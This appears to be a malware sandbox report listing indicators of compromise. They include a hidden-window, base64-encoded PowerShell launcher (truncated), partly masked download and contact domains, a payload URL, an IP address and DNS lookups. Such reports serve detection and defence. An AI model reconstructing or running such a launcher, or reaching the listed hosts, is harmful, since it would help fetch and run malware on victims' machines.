Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABlAGMAbwBtAG0AZQByAGMAZQBpAHUAbgA9ACcAcwB1AHAAZQByAHMAdAByAHUAYwB0AHUAcgBlAGsAcQBhACcAOwAkAEYAcgB...
- 'th####kconcept.com':80
- http://th####kconcept.com/cgi-bin/gXLEOznm/
- '34.##9.100.209':443
- DNS ASK n0####lkeeper.com
- DNS ASK th####kconcept.com
- DNS ASK li######ppetschildcare.com
- DNS ASK en####sensorium.com
- DNS ASK ru##vet.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABlAGMAbwBtAG0AZQByAGMAZQBpAHUAbgA9ACcAcwB1AHAAZQByAHMAdAByAHUAYwB0AHUAcgBlAGsAcQBhACcAOwAkAEYAcgB...' (with hidden window)